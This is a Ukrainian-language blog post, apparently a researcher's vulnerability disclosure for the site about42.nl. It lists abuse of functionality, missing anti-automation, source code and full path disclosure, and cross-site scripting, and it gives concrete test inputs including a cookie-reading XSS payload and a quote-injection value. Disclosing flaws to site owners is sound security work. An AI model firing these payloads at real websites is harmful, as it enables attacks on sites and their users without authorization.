Уразливості на about42.nl
17:21 17.06.201112.10.2010
У червні, 25.06.2010, я знайшов Abuse of Functionality, Insufficient Anti-automation, Source Code Disclosure, Full path disclosure та Cross-Site Scripting уразливості на проекті http://about42.nl. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
17.06.2011
Abuse of Functionality:
http://about42.nl/www/showheaders.php
Через даний функціонал можна проводити атаки на інші сайти. А також DoS атаку на сам сервіс.
Insufficient Anti-automation:
http://about42.nl/www/showheaders.php
На даній сторінці немає захисту від автоматизованих запитів (капчі).
Source Code Disclosure (обмежений):
http://about42.nl/www/showsource.php
Full path disclosure:
http://about42.nl/www/showsource.php?page=/index.php/
POST запит на сторінці http://about42.nl/www/showheaders.php
'
В полі Url.
XSS:
POST запит на сторінці http://about42.nl/www/showheaders.php
<script>alert(document.cookie)</script>
В полі Url.